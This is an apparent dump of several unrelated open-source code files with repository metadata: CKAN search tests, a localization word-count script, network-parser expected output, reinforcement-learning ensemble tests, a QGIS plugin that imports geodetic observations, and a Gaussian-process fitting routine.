assert convert({"q": "bob", "order_by": "name"}) == {
"q": "bob",
"sort": "name asc",
}
assert convert({"q": "bob", "offset": "0", "limit": "10"}) == {
"q": "bob",
"start": "0",
"rows": "10",
}
assert convert({"tags": ["russian", "tolstoy"]}) == {
"q": 'tags:"russian" tags:"tolstoy"'
}
assert convert({"tags": ["russian", "multi word"]}) == {
"q": 'tags:"russian" tags:"multi word"'
}
assert convert({"tags": ["with CAPITALS"]}) == {
"q": 'tags:"with CAPITALS"'
}
assert convert({"tags": [u"with greek omega \u03a9"]}) == {
"q": u'tags:"with greek omega \u03a9"'
}
assert convert({"tags": ["tolstoy"]}) == {"q": 'tags:"tolstoy"'}
assert convert({"tags": "tolstoy"}) == {"q": 'tags:"tolstoy"'}
assert convert({"tags": "more than one tolstoy"}) == {
"q": 'tags:"more than one tolstoy"'
}
assert convert({"tags": u"with greek omega \u03a9"}) == {
"q": u'tags:"with greek omega \u03a9"'
}
assert convert({"title": "Seymour: An Introduction"}) == {
"q": r'title:"Seymour\: An Introduction"'
}
assert convert({"title": "Pop!"}) == {"q": r"title:Pop\!"}
with pytest.raises(search.SearchError):
convert({"tags": {"tolstoy": 1}})
@pytest.mark.usefixtures("clean_db", "clean_index")
class TestPackageQuery:
def test_all_records_by_shared_notes(self):
pkg1 = factories.Dataset(notes="shared")
pkg2 = factories.Dataset(notes="shared")
pkg3 = factories.Dataset(notes="shared")
result = search.query_for(model.Package).run({"q": "shared"})
assert {pkg1["name"], pkg2["name"], pkg3["name"]} == set(result["results"])
def test_single_by_name(self):
factories.Dataset(name="first")
factories.Dataset(name="second")
result = search.query_for(model.Package).run({"q": u"first"})
assert result["results"] == ["first"]
def test_name_multiple_results(self):
factories.Dataset(name="first-record")
factories.Dataset(name="second-record")
factories.Dataset(name="third-dataset")
result = search.query_for(model.Package).run({"q": u"record"})
assert set(result["results"]) == {"first-record", "second-record"}
def test_title_token(self):
pkg1 = factories.Dataset(title="first record")
pkg2 = factories.Dataset(title="second record")
factories.Dataset(title="third dataset")
result = search.query_for(model.Package).run({"q": u"title:record"})
assert set(result["results"]) == {pkg1["name"], pkg2["name"]}
def test_not_real_license(self):
factories.Dataset()
result = search.query_for(model.Package).run(
{"q": u'license:"OKD::Other (PublicsDomain)"'}
)
assert result["count"] == 0, result
def test_quotation(self):
pkg1 = factories.Dataset(title="Government Expenditure")
factories.Dataset(title="Government Extra Expenditure")
# multiple words quoted
result = search.query_for(model.Package).run(
{"q": u'"Government Expenditure"'}
)
assert [pkg1["name"]] == result["results"]
# multiple words quoted wrong order
result = search.query_for(model.Package).run(
{"q": u'"Expenditure Government"'}
)
assert result["results"] == []
def test_tags_field_split_word(self):
pkg1 = factories.Dataset(tags=[{"name": "split todo"}])
result = search.query_for(model.Package).run({"q": u"todo split"})
assert result["results"] == [pkg1["name"]]
def test_tags_field_with_capitals(self):
pkg1 = factories.Dataset(tags=[{"name": "capitals"}])
result = search.query_for(model.Package).run({"q": u"CAPITALS"})
assert result["results"] == [pkg1["name"]]
def dont_test_tags_field_with_basic_unicode(self):
pkg1 = factories.Dataset(tags=[{"name": "greek omega \u03a9"}])
result = search.query_for(model.Package).run(
{"q": u"greek omega \u03a9"}
)
assert result["results"] == [pkg1["name"]]
def test_tags_token_simple(self):
pkg1 = factories.Dataset(tags=[{"name": "country-sweden"}])
result = search.query_for(model.Package).run(
{"q": u"tags:country-sweden"}
)
assert result["results"] == [pkg1["name"]]
def test_tags_token_with_multi_word_tag(self):
pkg1 = factories.Dataset(tags=[{"name": "todo split"}])
result = search.query_for(model.Package).run(
{"q": u'tags:"todo split"'}
)
assert result["results"] == [pkg1["name"]]
    def test_tags_token_multiple(self):
        pkg1 = factories.Dataset(tags=[{"name": "country-sweden"}, {"name": "format-pdf"}])
        result = search.query_for(model.Package).run(
            {"q": u"tags:country-sweden tags:format-pdf"}
        )
        assert result["results"] == [pkg1["name"]]
        # Tags that do not exist in this test's data match nothing.
        result = search.query_for(model.Package).run(
            {"q": u'tags:"todo split" tags:war'}
        )
        assert result["results"] == []
def test_tags_token_with_punctuation(self):
pkg1 = factories.Dataset(tags=[{"name": "surprise."}])
result = search.query_for(model.Package).run(
{"q": u'tags:"surprise."'}
)
assert result["results"] == [pkg1["name"]]
def test_overall(self):
CreateTestData.create()
query = search.query_for(model.Package)
assert query.run({"q": "annakarenina"})["count"] == 1
assert query.run({"q": "warandpeace"})["count"] == 1
assert query.run({"q": ""})["count"] == 2
assert query.run({"q": "Tolstoy"})["count"] == 1
assert query.run({"q": "title:Novel"})["count"] == 1
assert query.run({"q": "title:peace"})["count"] == 0
assert query.run({"q": "name:warandpeace"})["count"] == 1
assert query.run({"q": "groups:david"})["count"] == 2
assert query.run({"q": "groups:roger"})["count"] == 1
assert query.run({"q": "groups:lenny"})["count"] == 0
assert query.run({"q": 'tags:"russian"'})["count"] == 2
assert query.run({"q": 'tags:"Flexible \u30a1"'})["count"] == 2
assert query.run({"q": "Flexible \u30a1"})["count"] == 2
assert query.run({"q": "Flexible"})["count"] == 2
assert query.run({"q": "flexible"})["count"] == 2
| 2.5 | 2 |
localization/scripts/wordcount.py | Ubastic/SlayTheSpire_Modify | 0 | 12770039 | <reponame>Ubastic/SlayTheSpire_Modify<filename>localization/scripts/wordcount.py
"""
This script counts words in json files.
Example usage:
python3 wordcount.py eng/achievements.json # count words in single file
python3 wordcount.py eng # count words in single dir
python3 wordcount.py # count all words for all language dirs
"""
import json
import sys
import os
import glob
from util import get_loc_dirs
def extract_values(item):
words = []
def _extract_values(d):
if isinstance(d, list):
for v in d:
_extract_values(v)
elif isinstance(d, dict):
for v in list(d.values()):
_extract_values(v)
elif isinstance(d, str):
words.append(d)
else:
words.append(str(d))
_extract_values(item)
return words
def read_file(filename):
with open(filename) as f:
data = f.read()
return json.loads(data)
def word_count(data):
values = extract_values(data)
words = ' '.join(values).split(' ')
return len(words)
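# Example (sketch): word_count({"title": "hello world", "n": 2}) == 3, since
# extract_values() flattens the values to ["hello world", "2"] before joining
# and splitting on single spaces. Note that an empty string value still
# counts as one word under this scheme.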
def process(files):
    print(files)
    # sum() also handles an empty file list gracefully (reduce would raise).
    wcount = sum(word_count(read_file(f)) for f in files)
    print("total words: " + str(wcount))
def extract_per_language(lang):
files = glob.glob("{}/*.json".format(lang))
process(files)
def main():
files = sys.argv[1:]
if len(files) == 0:
lang_packs = get_loc_dirs()
list(map(extract_per_language, lang_packs))
elif os.path.isdir(files[0]):
list(map(extract_per_language, files))
else:
process(files)
if __name__ == "__main__":
main()
| 3.375 | 3 |
src/obfuscapk/obfuscators/new_signature/__init__.py | Elyorbe/Obfuscapk | 688 | 12770040 | <reponame>Elyorbe/Obfuscapk
#!/usr/bin/env python3
from .new_signature import NewSignature
| 0.882813 | 1 |
src/genie/libs/parser/iosxe/tests/ShowPlatformSoftwareFedactiveFnfEtAnalyticsFlows/cli/equal/golden_output_expected.py | balmasea/genieparser | 204 | 12770041 | <reponame>balmasea/genieparser<filename>src/genie/libs/parser/iosxe/tests/ShowPlatformSoftwareFedactiveFnfEtAnalyticsFlows/cli/equal/golden_output_expected.py
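# Expected parsed structure for the IOS-XE command
# "show platform software fed active fnf et-analytics-flows" (inferred from
# the parser class name in the file path above).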
expected_output = {'current-eta-records': 0,
'excess-packets-received': 60,
'excess-syn-received': 0,
'total-eta-fnf': 2,
'total-eta-idp': 2,
'total-eta-records': 4,
'total-eta-splt': 2,
'total-packets-out-of-order': 0,
'total-packets-received': 80,
'total-packets-retransmitted': 0}
| 1.039063 | 1 |
tests/unit/bellman/environments/transition_model/keras_models/test_trajectory_sampling.py | RL-Gym/bellman | 40 | 12770042 | <reponame>RL-Gym/bellman<filename>tests/unit/bellman/environments/transition_model/keras_models/test_trajectory_sampling.py<gh_stars>10-100
# Copyright 2021 The Bellman Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
import tensorflow as tf
from bellman.environments.transition_model.keras_model.trajectory_sampling import (
InfiniteHorizonTrajectorySampling,
MeanTrajectorySamplingStrategy,
OneStepTrajectorySampling,
)
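# These tests exercise the round-trip property of the trajectory sampling
# strategies: transform_step_inputs partitions a batch across the ensemble
# members, and transform_step_outputs must reassemble the partitions in the
# original batch order.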
def test_batch_partition_is_reversible(
trajectory_sampling_strategy_factory, batch_size, ensemble_size
):
strategy = trajectory_sampling_strategy_factory(batch_size, ensemble_size)
starting_tensor = tf.range(batch_size)
input_tensors = strategy.transform_step_inputs([starting_tensor])
output_tensor = strategy.transform_step_outputs(input_tensors)
np.testing.assert_array_equal(output_tensor, starting_tensor)
def test_update_batch_batch_partition_is_reversible(
trajectory_sampling_strategy_factory, batch_size, ensemble_size
):
strategy = trajectory_sampling_strategy_factory(batch_size, ensemble_size)
strategy.update_batch_size(2 * batch_size)
starting_tensor = tf.range(2 * batch_size)
input_tensors = strategy.transform_step_inputs([starting_tensor])
output_tensor = strategy.transform_step_outputs(input_tensors)
np.testing.assert_array_equal(output_tensor, starting_tensor)
def test_batch_partition_is_reversible_within_tf_function(
trajectory_sampling_strategy_factory, batch_size, ensemble_size
):
strategy = trajectory_sampling_strategy_factory(batch_size, ensemble_size)
starting_tensor = tf.range(batch_size, dtype=tf.float32)
@tf.function
def inner_function():
input_tensors = strategy.transform_step_inputs([starting_tensor])
return strategy.transform_step_outputs(input_tensors)
output_tensor = inner_function()
np.testing.assert_array_equal(output_tensor, starting_tensor)
def test_batch_partition_is_consistent_on_input_tensors(
trajectory_sampling_strategy_factory, batch_size, ensemble_size
):
strategy = trajectory_sampling_strategy_factory(batch_size, ensemble_size)
# Set up the values of the tensors such that they are different by scaling the second tensor.
input_tensors = [tf.range(batch_size), batch_size * tf.range(batch_size)]
transformed_input_tensors = strategy.transform_step_inputs(input_tensors)
transformed_input_tensors_iter = iter(transformed_input_tensors)
for tensor_pair in zip(transformed_input_tensors_iter, transformed_input_tensors_iter):
# Scale the values of the first tensor to ensure that the same indices were used to
# partition both input tensors.
np.testing.assert_array_equal(batch_size * tensor_pair[0], tensor_pair[1])
@pytest.fixture(name="fix_random_seed")
def _fix_random_seed_fixture():
global_seed, _ = tf.compat.v1.random.get_seed(None)
tf.random.set_seed(1)
yield
tf.random.set_seed(global_seed)
def test_one_step_trajectory_sampling_resample_indices(fix_random_seed):
batch_size = 5
ensemble_size = 10
strategy = OneStepTrajectorySampling(batch_size, ensemble_size)
input_tensor = tf.range(batch_size)
first_transformed_tensors = strategy.transform_step_inputs([input_tensor])
first_indices = [ind for ind, el in enumerate(first_transformed_tensors) if len(el)]
second_transformed_tensors = strategy.transform_step_inputs([input_tensor])
second_indices = [ind for ind, el in enumerate(second_transformed_tensors) if len(el)]
assert not np.array_equal(first_indices, second_indices)
def test_infinite_horizon_trajectory_sampling_do_not_resample_indices_each_time(batch_size):
ensemble_size = 100
strategy = InfiniteHorizonTrajectorySampling(batch_size, ensemble_size)
input_tensor = tf.range(batch_size)
first_transformed_tensors = strategy.transform_step_inputs([input_tensor])
first_indices = [ind for ind, el in enumerate(first_transformed_tensors) if len(el)]
second_transformed_tensors = strategy.transform_step_inputs([input_tensor])
second_indices = [ind for ind, el in enumerate(second_transformed_tensors) if len(el)]
np.testing.assert_array_equal(first_indices, second_indices)
def test_infinite_horizon_trajectory_sampling_resample_indices(fix_random_seed):
batch_size = 5
ensemble_size = 10
strategy = InfiniteHorizonTrajectorySampling(batch_size, ensemble_size)
input_tensor = tf.range(batch_size)
first_transformed_tensors = strategy.transform_step_inputs([input_tensor])
first_indices = [ind for ind, el in enumerate(first_transformed_tensors) if len(el)]
strategy.train_model()
second_transformed_tensors = strategy.transform_step_inputs([input_tensor])
second_indices = [ind for ind, el in enumerate(second_transformed_tensors) if len(el)]
assert not np.array_equal(first_indices, second_indices)
def test_mean_trajectory_sampling_duplicate_input_tensors(batch_size, ensemble_size):
strategy = MeanTrajectorySamplingStrategy(ensemble_size)
# Set up the values of the tensors such that they are different by scaling the second tensor.
input_tensors = [tf.range(batch_size), batch_size * tf.range(batch_size)]
transformed_input_tensors = strategy.transform_step_inputs(input_tensors)
assert len(transformed_input_tensors) == 2 * ensemble_size
transformed_input_tensors_iter = iter(transformed_input_tensors)
for tensor_pair in zip(transformed_input_tensors_iter, transformed_input_tensors_iter):
np.testing.assert_array_equal(tensor_pair, input_tensors)
def test_mean_trajectory_sampling_transform_outputs(batch_size, ensemble_size):
strategy = MeanTrajectorySamplingStrategy(ensemble_size)
# Specify tensors which will have an integer mean to avoid numerical issues.
output_tensors = [2 * (i + 1) * tf.range(batch_size) for i in range(ensemble_size)]
transformed_output_tensors = strategy.transform_step_outputs(output_tensors)
np.testing.assert_array_equal(
transformed_output_tensors, (ensemble_size + 1) * tf.range(batch_size)
)
| 2.078125 | 2 |
flame/algorithms/import_observationer_by_location.py | busstoptaktik/FIRE | 0 | 12770043 | # -*- coding: utf-8 -*-
from fire.api.model.punkttyper import GeometriObjekt, PunktInformation
__author__ = "Septima"
__date__ = "2019-12-02"
__copyright__ = "(C) 2019 by Septima"
import os
from datetime import datetime
from typing import List, Dict
from PyQt5.QtCore import QCoreApplication
from PyQt5.QtGui import QIcon
from qgis.core import (
QgsProcessing,
QgsFeatureSink,
QgsProcessingAlgorithm,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterString,
QgsProcessingParameterBoolean,
QgsProcessingParameterEnum,
QgsWkbTypes,
QgsFeature,
QgsField,
QgsFields,
QgsProcessingFeedback,
QgsGeometry,
QgsPoint,
QgsProject,
)
from qgis.PyQt.QtCore import Qt, QVariant, QDateTime, QTime
try:
from fire.api import FireDb
except ImportError:
    # fire is an optional dependency; canExecute() reports if it is missing.
FireDb = None
from fire.api.model import Geometry, Observation, Punkt, Koordinat
from .datetime_widget import DateTimeWidget
from .ui.nullable_datetime_wrapper import NullableDateTimeWrapper
import processing
class ImportObservationerByLocationAlgorithm(QgsProcessingAlgorithm):
OUTPUT = "OUTPUT"
INPUT = "INPUT"
OBSERVATION_TYPE = "OBSERVATION_TYPE"
APPLY_THEME = "APPLY_THEME"
FROM_DATE = "FROM_DATE"
TO_DATE = "TO_DATE"
def __init__(self, settings):
QgsProcessingAlgorithm.__init__(self)
self.settings = settings
def initAlgorithm(self, config):
self.addParameter(
QgsProcessingParameterFeatureSource(
self.INPUT,
self.tr("Importér observationer indenfor (within)"),
[QgsProcessing.TypeVectorPolygon],
)
)
self.OBSERVATION_TYPES = [
(1, self.tr("Koteforskel opmålt geometrisk")),
(2, self.tr("Koteforskel opmålt trigonometrisk")),
]
o = QgsProcessingParameterEnum(
name=self.OBSERVATION_TYPE,
description=self.tr("Observationstype"),
options=[x[1] for x in self.OBSERVATION_TYPES],
allowMultiple=True,
defaultValue=[0, 1],
)
o.setMetadata({"widget_wrapper": {"useCheckBoxes": True, "columns": 2}})
self.addParameter(o)
param = QgsProcessingParameterString(
name=self.FROM_DATE, description="Fra Dato", optional=True
)
param.setMetadata({"widget_wrapper": {"class": NullableDateTimeWrapper}})
self.addParameter(param)
param = QgsProcessingParameterString(
name=self.TO_DATE, description="Til Dato", optional=True
)
param.setMetadata({"widget_wrapper": {"class": NullableDateTimeWrapper}})
self.addParameter(param)
self.addParameter(
QgsProcessingParameterFeatureSink(self.OUTPUT, self.tr("Observationer"))
)
self.addParameter(
QgsProcessingParameterBoolean(
self.APPLY_THEME,
self.tr("Anvend standard fikspunktregister-symbologi"),
defaultValue=True,
)
)
def processAlgorithm(self, parameters, context, feedback: QgsProcessingFeedback):
# Input / Output
source = self.parameterAsSource(parameters, self.INPUT, context)
(sink, dest_id) = self.create_output_sink(
parameters, context, source.sourceCrs()
)
# Filter parameters
observation_type_indices = self.parameterAsEnums(
parameters, self.OBSERVATION_TYPE, context
)
observation_types = list(
map(lambda i: self.OBSERVATION_TYPES[i][0], observation_type_indices)
)
from_date = None
from_date_string = self.parameterAsString(parameters, self.FROM_DATE, context)
if from_date_string:
from_date = datetime.fromisoformat(from_date_string)
to_date = None
to_date_string = self.parameterAsString(parameters, self.TO_DATE, context)
if to_date_string:
to_date = datetime.fromisoformat(to_date_string)
fire_connection_string = self.settings.value("fire_connection_string")
fireDb = FireDb(fire_connection_string, debug=True)
features = list(source.getFeatures())
total_num_features = len(features)
total_num_features_processed = 0
for feature in features:
if feedback.isCanceled():
return {}
wkt = feature.geometry().asWkt().upper()
geometry = Geometry(wkt)
observations = fireDb.hent_observationer_naer_geometri(
geometri=geometry, afstand=0, tidfra=from_date, tidtil=to_date
)
pid_list = self.get_pids_from_observations(observations)
geometriobjekter = self.get_geometriobjekter_from_pids(fireDb, pid_list)
idents = self.get_idents_from_pids(fireDb, pid_list)
feedback.setProgressText(
"Fandt {antal} observationer".format(antal=len(observations))
)
feedback.setProgressText(
"Fandt {antal} geometriobjekter".format(antal=len(geometriobjekter))
)
feedback.setProgressText("Fandt {antal} idents".format(antal=len(idents)))
for current, observation in enumerate(observations):
observation_type_id = observation.observationstypeid
if observation_type_id in observation_types:
feature = self.create_feature_from_observation(
observation, geometriobjekter, idents, feedback
)
if feature:
sink.addFeature(feature, QgsFeatureSink.FastInsert)
            # Count processed source features (not individual observations) so
            # the ratio below stays within [0, 1]; setProgress expects 0-100.
            total_num_features_processed = total_num_features_processed + 1
            feedback.setProgress(100 * total_num_features_processed / total_num_features)
if feedback.isCanceled():
return {}
apply_theme = self.parameterAsBool(parameters, self.APPLY_THEME, context)
if apply_theme:
style_file = os.path.join(
os.path.dirname(__file__), "..", "styles", "observation.qml"
)
alg_params = {"INPUT": dest_id, "STYLE": style_file}
processing.run(
"qgis:setstyleforvectorlayer",
alg_params,
context=context,
feedback=feedback,
is_child_algorithm=True,
)
return {self.OUTPUT: dest_id}
def create_output_sink(self, parameters, context, crs):
fields = QgsFields()
fields.append(QgsField("observation_id", QVariant.String))
fields.append(QgsField("observation_type_id", QVariant.Double))
fields.append(QgsField("fikspunkt1_uuid", QVariant.String))
fields.append(QgsField("fikspunkt1_ident", QVariant.String))
fields.append(QgsField("fikspunkt2_uuid", QVariant.String))
fields.append(QgsField("fikspunkt2_ident", QVariant.String))
fields.append(QgsField("registrering_fra", QVariant.DateTime))
fields.append(QgsField("registrering_fra_iso", QVariant.String))
fields.append(QgsField("koteforskel", QVariant.Double))
fields.append(QgsField("nivellementslaengde", QVariant.Double))
fields.append(QgsField("antal_opstillinger", QVariant.Double))
fields.append(QgsField("afstandsafhaengig_varians", QVariant.Double))
fields.append(QgsField("afstandsuafhaengig_varians", QVariant.Double))
fields.append(QgsField("Praecisionsnivellement", QVariant.Double))
(sink, dest_id) = self.parameterAsSink(
parameters, self.OUTPUT, context, fields, QgsWkbTypes.LineString, crs
)
return (sink, dest_id)
def get_pids_from_observations(self, observations: List[Observation]):
pid_list = []
for o in observations:
op_id = o.opstillingspunktid
if op_id not in pid_list: # Point not already found
pid_list.append(op_id)
sp_id = o.sigtepunktid
if sp_id not in pid_list: # Point not already found
pid_list.append(sp_id)
return pid_list
def get_geometriobjekter_from_pids(self, fireDb, pid_list):
# return dict of {punktid: geometriobjekt}
# Get geometriobjekter
gos: List[GeometriObjekt] = (
fireDb.session.query(GeometriObjekt)
.filter(
GeometriObjekt.punktid.in_(pid_list),
GeometriObjekt._registreringtil == None,
)
.all()
)
go_by_pid = {}
for go in gos:
go_by_pid[go.punktid] = go
return go_by_pid
def get_idents_from_pids(self, fireDb, pid_list):
# return dict of {punktid: ident: string}
# GI(346)->GNSS(343)->landsnr(342)->refgeo_id(344)->uuid
info_type_list = [346, 343, 342, 344]
infos: List[PunktInformation] = (
fireDb.session.query(PunktInformation)
.filter(
PunktInformation.punktid.in_(pid_list),
PunktInformation.infotypeid.in_(info_type_list),
)
.order_by(PunktInformation.punktid, PunktInformation.infotypeid)
.all()
)
ident_by_pid = {}
if len(infos) > 0:
current_index = 0
while current_index is not None:
current_info: PunktInformation = infos[current_index]
current_pid = current_info.punktid
ident = self.get_index_ident(current_index, infos)
ident_by_pid[current_pid] = ident
current_index = self.next_index(current_index, infos)
return ident_by_pid
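    # Example (sketch): for a point carrying both a GNSS ident and a landsnr,
    # get_idents_from_pids yields {"<punktid>": "GNSS:<tekst>"}, because GNSS
    # (343) outweighs landsnr (342) in get_info_weight below.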
def get_index_ident(self, current_index, infos: List[PunktInformation]):
current_pid = infos[current_index].punktid
best_info = infos[current_index]
best_info_weight = self.get_info_weight(best_info)
inc = 1
while (
current_index + inc < len(infos)
and infos[current_index + inc].punktid == current_pid
):
current_info = infos[current_index + inc]
current_info_weight = self.get_info_weight(current_info)
if current_info_weight > best_info_weight:
best_info = current_info
best_info_weight = current_info_weight
inc = inc + 1
return self.get_ident_text(best_info)
    def get_info_weight(self, info: PunktInformation):
        if info.infotypeid == 346:
            return 4
        elif info.infotypeid == 343:
            return 3
        elif info.infotypeid == 342:
            return 2
        elif info.infotypeid == 344:
            return 1
        # Unknown info types rank lowest rather than returning None.
        return 0
def get_ident_text(self, info: PunktInformation):
if info.infotypeid == 346:
return "GI:" + info.tekst
elif info.infotypeid == 343:
return "GNSS:" + info.tekst
elif info.infotypeid == 342:
return "landsnr:" + info.tekst
elif info.infotypeid == 344:
return "refgeo_id:" + info.tekst
def next_index(self, current_index, infos: List[PunktInformation]):
current_pid = infos[current_index].punktid
inc = 1
while (
current_index + inc < len(infos)
and infos[current_index + inc].punktid == current_pid
):
inc = inc + 1
if current_index + inc < len(infos):
return current_index + inc
else:
return None
def create_feature_from_observation(
self,
observation: Observation,
geometriobjekter: Dict[str, GeometriObjekt],
idents: Dict[str, str],
feedback: QgsProcessingFeedback,
):
observation_id = observation.objektid
fikspunkt1_id = observation.opstillingspunktid
fikspunkt1_ident = "uuid:" + fikspunkt1_id
if fikspunkt1_id in idents:
fikspunkt1_ident = idents[fikspunkt1_id]
fikspunkt2_id = observation.sigtepunktid
fikspunkt2_ident = "uuid:" + fikspunkt2_id
if fikspunkt2_id in idents:
fikspunkt2_ident = idents[fikspunkt2_id]
geometriobjekt1 = geometriobjekter[fikspunkt1_id]
geometriobjekt2 = geometriobjekter[fikspunkt2_id]
line_geometry = self.create_line_geometry_from_geometriobjekter(
geometriobjekt1, geometriobjekt2, feedback
)
if line_geometry:
# Felter, der skal gemmes på feature:
# [QgsField("observation_id", QVariant.String),
# QgsField("observation_type_id", QVariant.Double)
# QgsField("fikspunkt1_id", QVariant.String),
# QgsField("fikspunkt1_ident", QVariant.String),
# QgsField("fikspunkt2_id", QVariant.String),
# QgsField("fikspunkt2_ident", QVariant.String),
# QgsField("registrering_fra", QVariant.DateTime),
# QgsField("registrering_fra_iso", QVariant.String),
# QgsField("koteforskel", QVariant.Double),
# QgsField("nivellementslaengde", QVariant.Double),
# QgsField("antal_opstillinger", QVariant.Double), Value3
# QgsField("afstandsafhaengig_varians", QVariant.Double), (value5 for id=1, value4 for id=2)
# QgsField("afstandsuafhaengig_varians", QVariant.Double), (value6 for id=1, value5 for id=2)
# QgsField("Praecisionsnivellement", QVariant.Double)], (value7 for id=1, 0 for id=2)
observation_type_id = observation.observationstypeid
registrering_fra = QDateTime(observation.registreringfra)
registrering_fra_iso = registrering_fra.toString(Qt.ISODate)
koteforskel = observation.value1
nivellementslaengde = observation.value2
antal_opstillinger = observation.value3
if observation_type_id == 1:
afstandsafhaengig_varians = observation.value5
afstandsuafhaengig_varians = observation.value6
Praecisionsnivellement = observation.value7
elif observation_type_id == 2:
afstandsafhaengig_varians = observation.value4
afstandsuafhaengig_varians = observation.value5
Praecisionsnivellement = 0
else:
# Observationstypeid > 2
feedback.setProgressText(
"observation_type_id > 2 for observation med id = {id}. Springes over".format(
id=observation_id
)
)
return None
# create the feature
feature = QgsFeature()
feature.setGeometry(line_geometry)
feature.setAttributes(
[
observation_id,
observation_type_id,
fikspunkt1_id,
fikspunkt1_ident,
fikspunkt2_id,
fikspunkt2_ident,
registrering_fra,
registrering_fra_iso,
koteforskel,
nivellementslaengde,
antal_opstillinger,
afstandsafhaengig_varians,
afstandsuafhaengig_varians,
Praecisionsnivellement,
]
)
return feature
else:
# A geometry could not be established
feedback.setProgressText(
"En liniegeometri kunne IKKE opettes for observation med id = {id}".format(
id=observation_id
)
)
return None
def create_line_geometry_from_geometriobjekter(
self,
geometriobjekt1: GeometriObjekt,
geometriobjekt2: GeometriObjekt,
feedback: QgsProcessingFeedback,
):
if geometriobjekt1 and geometriobjekt2:
wkt1 = geometriobjekt1.geometri.wkt
g1 = QgsPoint()
g1.fromWkt(wkt1)
wkt2 = geometriobjekt2.geometri.wkt
g2 = QgsPoint()
g2.fromWkt(wkt2)
geom = QgsGeometry.fromPolyline([g1, g2])
return geom
else:
return None
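    # Sketch of the construction above (hypothetical WKT input; QgsPoint.fromWkt parses
    # in place and returns a bool, so the point objects are mutated, not reassigned):
    #   p1 = QgsPoint(); p1.fromWkt("POINT Z (10.2 56.1 0)")
    #   line = QgsGeometry.fromPolyline([p1, p2])  # the two fikspunkter joined by a line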
def name(self):
return "fire-import-observations-location"
def displayName(self):
return "Importér observationer fra FIRE ud fra placering"
def group(self):
return ""
def groupId(self):
return ""
def flags(self):
return QgsProcessingAlgorithm.FlagNoThreading
def tr(self, string):
return QCoreApplication.translate("Processing", string)
def createInstance(self):
return ImportObservationerByLocationAlgorithm(self.settings)
def canExecute(self):
if FireDb is None:
return (
False,
"Dette plugin er afhængigt af API'et til Fikspunktregistret. Se venligst https://github.com/Septima/fire-qgis#installation",
)
fire_connection_string = self.settings.value("fire_connection_string")
if fire_connection_string is None:
conf_message = "Kan ikke finde konfigurationsfil. Se venligst https://github.com/Kortforsyningen/fire-cli#konfigurationsfil for format og placering af konfigurationsfil"
return False, conf_message
else:
try:
fireDb = FireDb(fire_connection_string)
fireDb.hent_observationstyper()
return True, "OK"
except Exception as ex:
str_ex = str(ex)
fire_connection_file_path = self.settings.value(
"fire_connection_file_path"
)
return (
False,
"Fejl i forbindelse til Fikspunktregistret. Se venligst https://github.com/Kortforsyningen/fire-cli#konfigurationsfil for format og indhold af konfigurationsfil. Exception:["
+ str_ex
+ "] Konfigurationsfil:["
+ fire_connection_file_path
+ "]",
)
def shortHelpString(self):
help_string = "Importerer observationer fra Fikstpunktregistret, hvor\n- enten p1 eller p2 er indeholdt i forespørgselsgeometrien,\n- observationstype er som ønsket og\n- registrering-fra ligger indenfor dato-interval (Optionelt)\n\n"
conf_message = ""
fire_connection_string = self.settings.value("fire_connection_string")
if fire_connection_string is None:
conf_message = "Fejl i konfigurationsfil eller kan ikke finde konfigurationsfil. Se venligst https://github.com/Kortforsyningen/fire-cli#konfigurationsfil"
else:
fire_connection_file_path = self.settings.value("fire_connection_file_path")
conf_message = "Konfigurationsfil: " + fire_connection_file_path
return self.tr(help_string + conf_message)
def icon(self):
icon_path = os.path.join(os.path.dirname(__file__), "ui", "fire-export.png")
return QIcon(icon_path)
| 1.804688 | 2 |
leggps/training.py | jacksonloper/leg-gps | 8 | 12770044 | import scipy as sp
import scipy.optimize
from . import legops
import tensorflow as tf
import numpy as np
import numpy.random as npr
from . import constructions
def fit_model_family(ts,xs,model_family,p_init,maxiter=100,use_tqdm_notebook=False):
'''
Fits a custom LEG model
Input:
- ts: list of timestamp-vectors: nsamp x [ragged]
- xs: list of observations: nsamp x [ragged] x n
- model_family: model family to fit
        - p_init: initial conditions for the parameter vector of the model family
- [optional] maxiter -- max number of iters to use in BFGS
- [optional] use_tqdm_notebook -- whether to make an update bar with tqdm
Output: dictionary with lots of keys. See supplementary.pdf for details. Important keys are:
- message (result of optimization)
- params (a dictionary with keys for each parameter of a LEG model)
- nats (the negative log likelihood divided by the number of observations)
'''
# store initial values
N,R,B,Lambda=model_family.p2NRBL(p_init)
initial_params=dict(N=N.numpy(),R=R.numpy(),B=B.numpy(),Lambda=Lambda.numpy())
# process dedups
time_info=[constructions.dedup_ts(tf.convert_to_tensor(x,dtype=tf.float64)) for x in ts]
xs=[tf.convert_to_tensor(x,dtype=tf.float64) for x in xs]
n=xs[0].shape[1]
nobs = np.sum([np.prod(x.shape) for x in xs])
# functions for scipy.optimize
nats=[]
def func(p):
Ls=0
for x,(sub_ts,sub_idxs) in zip(xs,time_info):
Ls+= model_family.log_likelihood(sub_ts,x,sub_idxs,p)
loss=-Ls.numpy()/nobs
nats.append(loss)
return loss
def jac(p):
gs=0
for x,(sub_ts,sub_idxs) in zip(xs,time_info):
gs+= model_family.informant(sub_ts,x,sub_idxs,p)
return -gs/nobs
# get an initial loss
func(p_init)
# fit it
if use_tqdm_notebook:
import tqdm.notebook
with tqdm.notebook.tqdm() as t:
            def callback(*args,**kwargs):
                t.n = len(nats)  # show the total number of function evaluations so far
                t.refresh()
                t.set_description(f"nats={nats[-1]:.2f}")
result=sp.optimize.minimize(func,p_init,jac=jac,options=dict(maxiter=maxiter),callback=callback)
else:
result=sp.optimize.minimize(func,p_init,jac=jac,options=dict(maxiter=maxiter))
# supplement loss dictionary with some stuff of interest
result['nats']=nats
# store initial params
result['initial_params']=initial_params
# store final params:
N,R,B,Lambda=model_family.p2NRBL(result['x'])
result['params']=dict(N=N.numpy(),R=R.numpy(),B=B.numpy(),Lambda=Lambda.numpy())
# we call the parameters "p" not "x"
result['p']=result['x']
del result['x']
# done
return result
def fit(ts,xs,ell=None,N=None,R=None,B=None,Lambda=None,maxiter=100,use_tqdm_notebook=False):
'''
fit the LEG model with rank ell
Input:
- ts: list of timestamp-vectors: nsamp x [ragged]
